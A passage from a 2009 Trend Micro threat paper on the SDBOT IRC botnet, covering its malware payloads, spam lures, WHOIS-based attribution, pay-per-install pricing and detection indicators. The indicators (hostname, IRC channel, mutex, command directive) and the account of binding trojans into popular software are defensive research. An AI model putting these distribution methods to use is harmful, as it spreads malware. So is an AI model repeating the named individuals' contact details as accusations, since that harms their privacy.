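The parser keys on the first " :" of the line, which is why the smiley ": )" inside the MSN message text does not break the split. In a real deployment the same extractor can run over an IDS stream or a pcap's TCP payloads; the detection value lies in the directive grammar and the channel names, not in the server IP, which the paper observed rotating.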
• 8. SDBOT IRC Botnet Continues to Make Waves
Some of the malware listed are among the more dangerous ones researchers have seen recently. The following sections provide short profiles of some of these malware, whose routines make vivid how dangerous it is to be part of an IRC botnet nowadays.

TROJ_CUTWAIL (PUSHDO/PANDEX)
If a machine is infected by TROJ_CUTWAIL, it is almost certain that it is part of a botnet called "CUTWAIL" (also known as "PUSHDO" or "PANDEX"). This botnet is one of the largest spam botnets in the world. It has been responsible for several known spam campaigns that advertise pharmaceutical products (e.g., Viagra) or pharmaceutical companies (e.g., Canadian Pharmacy). This botnet is also responsible for malware-related spam campaigns, specifically the recent U.S. Independence Day spam, which contained malicious links that, when clicked, led recipients to a website to download a WORM_WALEDAC variant. Researchers have also seen this botnet send out ecard spam in July. These email messages bore the same email body even though the attached file ecard.exe could be either a TROJ_CUTWAIL or a TROJ_ZBOT variant.

TROJ_FAKEAV
Most security- or tech-savvy users are already familiar with rogue antivirus (FAKEAV) malware. These programs usually claim to rid a system of infections that, in fact, they planted themselves. In recent months, FAKEAV variants have arrived as the final payload of blackhat search engine optimization (SEO) attacks. However, FAKEAV can also be part (i.e., one of the links) of other malware infection chains.

WORM_KOOBFACE
KOOBFACE is well known for spreading among social networking websites such as Facebook, Friendster, Twitter, and some others. Users may receive spammed messages in their Facebook inboxes containing links to a particular video. These links, however, lead to the download of a KOOBFACE variant instead. KOOBFACE is one of the biggest Web 2.0 botnets spreading on Facebook, MySpace, and Twitter.
• 9. SDBOT IRC Botnet Continues to Make Waves
SOCIAL ENGINEERING
SDBOT uses various social engineering techniques to lure victims, the most common of which is running spam waves featuring:
• Self-promotion spam
• Prestige replica spam
• Other social engineering spam

Spam Wave 1: Self-Promotion Spam
Self-promotion spam waves send malicious links to personal profile pages or files, with a short message intended to convince users to click the link and thereby download a malicious file, which connects them to the botnet (see Figure 6).
Figure 6. Self-promotion spam

Spam Wave 2: Prestige Replica Spam
Prestige replica spam waves send links to replica sites, with a short message intended to convince users to click the link and buy replica watches (see Figure 7).
Figure 7. Prestige replica spam
• 10. SDBOT IRC Botnet Continues to Make Waves
Spam Wave 3: Other Social Engineering Spam
Most of the other social engineering spam waves send malicious links to sites hosting news on popular events (e.g., Michael Jackson's death), with a short message intended to convince users to click the link and thereby download a malicious file, which connects them to the botnet (see Figure 8).
Figure 8. Other social engineering spam
• 11. SDBOT IRC Botnet Continues to Make Waves
BEHIND THE MALWARE: BOTNET OWNERS
As part of this study, the researcher has been looking at everything related to the burimche.net domain, including the following:
• *.burimilol.com
• *.burimilol.net
• *.burimche.net
• burimi.*.net
While looking for information about these domain names, the researcher came across a forum where two members were talking about an executable file for sale. One of them was complaining that the user burimi @ nerashti.com had not created the file as promised even though he had already paid for that service.
Continuing the investigation on domain names, the researcher also looked for the newest related domain names but found that they had all been registered through free Internet services from Yahoo! or Altavista. The manner in which the cybercriminals register domain names has changed, making it harder for researchers to track them back. So the researcher decided to take a look instead at the oldest domain name, burimilol.net, and found the following:
[BURIMILOL.NET]
BURIM ALIJI NERASHTI 1203 TETOVO, 91200 MACEDONIA ALBANIA
[MAINMSN.COM]
nicKy, FisniK NERASHTI TETOVO, 20000
source://myspc.net/wievimage.php
Registrant MYSPC.NET: Bruno (edinplay@gmail.com) fajro 14 Ulqin* - Laç 40000 ALGERIA
*Ulqin is located in Montenegro, not in Algeria.
Burim in Albanian means "source." These findings suggest that these threats could originate from the Albanian, Macedonian, or Montenegrin regions.
• 12. SDBOT IRC Botnet Continues to Make Waves
As stated earlier, it has become hard to track the cybercriminals based on domain names, as for some reason they have resorted to using free Internet services from providers such as Yahoo! or Altavista. The cybercriminals continuously changed IP addresses as well, making the task even harder. For instance, tracking a single domain name can lead to several different IP addresses. In a month, a domain name can have around four different IP addresses (see Figure 9). For defenders, this is the practical argument for keying detections on the hostname, the IRC channel and the command strings rather than on any single IP address.
Figure 9. IP addresses a single domain name can resolve to
The botnet sends links to several domain names via MSN (see Figure 10).
• 13. SDBOT IRC Botnet Continues to Make Waves
Figure 10. Links sent via MSN
Given the nature of SDBOT, which is primarily geared toward downloading other malware files that each have their own distinct payloads and strong connections with other malware families, it appears that the botnet is in the business of renting out its reach and download capability to cybercriminals. These cybercriminals may either be interested in increasing their number of victims or in sending out spammed messages for various other purposes. This is a known malware business model wherein some cybercriminal gangs pay others to spread their malicious code. For the longest time, instead of conducting its own focused attacks, the SDBOT cybercriminal gang has kept itself busy responding to different business requests, such as installing FAKEAV, KOOBFACE, CUTWAIL, and other malware variants on its infected bots.
As security experts and threat researchers already know by now, botnets not only bring about big business; they are also, to a certain logical extent, interconnected with one another. Cybercriminals do business with other cybercriminals. This allows them to take advantage of other, possibly better, technologies and newer ways to spread their malicious code than when they do so on their own.
• 14. SDBOT IRC Botnet Continues to Make Waves
On top of being cybercriminals, they are first of all "real" criminals who conduct illegal business by stealing money and crucial or private information and ruining companies' businesses. Cybercriminal interconnections are becoming more popular. Working together is no longer a problem among cybercriminals, as it was in the past. As such, they have become stronger and harder to track. It is easy to see that money is driving all these illegal activities.
The only remaining question is, "Why use an 'old' technology such as an IRC botnet when lots of newer technologies can already be seen in the wild?" The answer is quite simple: this kind of botnet is currently off the radar, unlike several others (DOWNAD, ZEUS, WALEDAC, KOOBFACE, ILOMO, and PUSHDO) that are consistently monitored by researchers. Using a simple but effective type of botnet makes cybercriminals feel like they are in "heaven." They can opt to use not only one but several ways to spread malware.
• 15. SDBOT IRC Botnet Continues to Make Waves
SDBOT, THE PAY-PER-INSTALL MODEL, AND FAKEAV
FAKEAV variants are currently taking the threat landscape by storm. The use of the pay-per-install business model is also increasing, as the model is easy to use. A botnet owner now gets paid to install malware on already-infected PCs. For instance, a FAKEAV creator pays the SDBOT gang, which already owns an IRC botnet and controls thousands of infected machines, to push the FAKEAV file to those systems. The gang then gets paid a certain amount of money for each successful installation (see Table 1).

Table 1. Pay-per-install FAKEAV price list
Country code | Price
US | US$120
BR | US$60
TR | US$45
Mixed | US$25
GB, CA, DE | US$150

The following country codes can be included in mixed lists: A2, AE, AF, AM, AR, AT, AU, AZ, BD, BE, BG, BH, BR, BY, CA, CH, CI, CL, CN, CO, CZ, DE, DZ, EC, EG, ES, EU, FR, GB, GE, GH, GR, HK, HR, HU, ID, IL, IN, IQ, IR, IT, JO, JP, KG, KH, KR, KW, KZ, LK, LT, LV, LY, MA, MD, MK, MX, MY, NG, NI, NL, NP, NZ, OM, PA, PE, PH, PK, PL, PT, QA, RO, RS, RU, SA, SE, SG, SI, SK, SY, TH, TN, TR, TW, TZ, UA, US, UY, UZ, VN, YE, ZA.

• 16. SDBOT IRC Botnet Continues to Make Waves
As shown, the prices paid depend on the target country, mainly because the difficulty of compromising systems there is taken into account: the harder a system is to infect, the more the cybercriminal is paid for compromising it. For instance, compromising a computer located in North America or Europe is harder because it is better protected, and hence costs more. However, because more people have Internet access in these countries, more systems can be compromised there, which cybercriminals also take into consideration.
Pay-per-install services are publicly available on many Russian underground forums. Anyone can offer pay-per-install services for money. Target systems can be chosen in terms of:
• Region
• Country
• OS
• Language
Another way to make money in the pay-per-install business is to register on underground affiliate websites (see Figure 11). Cybercriminals provide the malware sample to interested parties, who then make it available for victims to install. Once the interested parties get the malware from an affiliate site, they bind it with a popular program and post it via torrents or peer-to-peer (P2P) networks. Binding is a popular technique used to merge two files into one. For example, any Trojan can be merged with Adobe Acrobat Writer, which can then be made available for download via torrents. Unknowing users then get a free Trojan along with Adobe Acrobat Writer. Binder tools are available all over the Web and are not hard to find.
• 17. SDBOT IRC Botnet Continues to Make Waves
BEST PRACTICES TO AVOID SDBOT MALWARE INFECTION
In the course of conducting research on SDBOT variants, the researcher came across some useful dos and don'ts that users can employ to avoid SDBOT malware infection:
• Do not click links sent via IM applications, especially if you do not know who sent them.
• Do update your security applications regularly to decrease the chances of becoming infected.
• Do not open unsolicited email or spam.
For analysts, the artifacts documented above are the ones to hunt for: the fxstaller.exe copy in C:\Windows and its Run value, the LiNbagGgsag mutex, the dddd.burimche.net hostname, the ##bb## channel and the .p.karikar directive. Do not rely on the 89.255.10.90 address alone, since the paper itself observed it rotating.
• 18. SDBOT IRC Botnet Continues to Make Waves
CONCLUSION
In this paper, we saw how this threat connects a user's system to an IRC network. We also saw how the botnet uses an infected system to spread other malware, which may connect it to another botnet. We observed how cybercriminals go about their business and how their networks are structured.
As such, we recommend the use of free tools such as RUBotted (see Figures 12 and 13) to detect whether a computer is part of an IRC botnet and HouseCall (see Figure 14) to clean an infected system. RUBotted monitors computers for suspicious activities and regularly checks with an online service to identify behaviors associated with bots.
Figure 12. RUBotted GUI
Figure 13. RUBotted message prompt
Figure 14. HouseCall GUI
HouseCall 7, Trend Micro's latest free online scanner, leverages the Smart Protection Network to deliver fast detection and removal of active malware. It zeroes in on active threats by checking key system areas used by malware programs. It also checks for malicious browser plug-ins, rootkits, and other auto-run executable files. Its new features include:
• A browser-independent client that eliminates compatibility issues often associated with other browser-activated scanners
• Smart Scan technology for targeted scanning of active malware, reducing scan time to several minutes
• 19. SDBOT IRC Botnet Continues to Make Waves
• In-the-cloud threat intelligence, delivering immediate detection while reducing download requirements
• Smart feedback that shares threat information with the Smart Protection Network, enabling data correlation across a global intelligence network to quickly discover new threats
• Review and restore functionality that lets a user compare current with past scan results and recover files
HouseCall is Trend Micro's highly popular and capable on-demand scanner for identifying and removing viruses, Trojans, worms, unwanted browser plug-ins, and other malware.
• 20. SDBOT IRC Botnet Continues to Make Waves
REFERENCES
• Trend Micro. (2009). Threat Encyclopedia. "BKDR_SDBOT.COD." http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=BKDR_SDBOT.COD (Retrieved August 2009).
• Trend Micro. (2009). Threat Encyclopedia. "TROJ_DROPPR.BH." http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DROPPR.BH (Retrieved August 2009).
TREND MICRO INC.
10101 N. De Anza Blvd., Cupertino, CA 95014
US toll free: 1 +800.228.5651
Phone: 1 +408.257.1500
Fax: 1 +408.257.2003
www.trendmicro.com
Trend Micro Incorporated is a pioneer in secure content and threat management. Founded in 1988, Trend Micro provides individuals and organizations of all sizes with award-winning security software, hardware and services. With headquarters in Tokyo and operations in more than 30 countries, Trend Micro solutions are sold through corporate and value-added resellers and service providers worldwide. For additional information and evaluation copies of Trend Micro products and services, visit our Web site at www.trendmicro.com.
©2009 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners.